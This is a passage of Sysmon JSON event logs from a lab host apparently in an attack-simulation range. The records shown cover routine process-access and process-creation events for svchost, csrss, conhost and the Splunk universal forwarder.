C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3378,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3379,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3380,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-0010596B0500}\r\nTargetProcessId: 2364\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-0010596B0500}","TargetProcessId":"2364","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3381,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.705\r\nProcessGuid: {41C8662E-1FF4-5F25-0000-00108E6C0500}\r\nProcessId: 2616\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" generate-ssl\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1FF4-5F25-0000-0010596B0500}\r\nParentProcessId: 2364\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.705","ProcessGuid":"{41C8662E-1FF4-5F25-0000-00108E6C0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" generate-ssl","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1FF4-5F25-0000-0010596B0500}","ParentProcessId":"2364","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3382,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.704\r\nSourceProcessGUID: {41C8662E-1FF4-5F25-0000-0010596B0500}\r\nSourceProcessId: 2364\r\nSourceThreadId: 2176\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-00108E6C0500}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1803d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.704","SourceProcessGUID":"{41C8662E-1FF4-5F25-0000-0010596B0500}","SourceProcessId":"2364","SourceThreadId":"2176","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-00108E6C0500}","TargetProcessId":"2616","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1803d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3383,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.704\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-00108E6C0500}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.704","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-00108E6C0500}","TargetProcessId":"2616","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3384,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.704\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.704","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3385,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.704\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.704","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3386,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.704\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 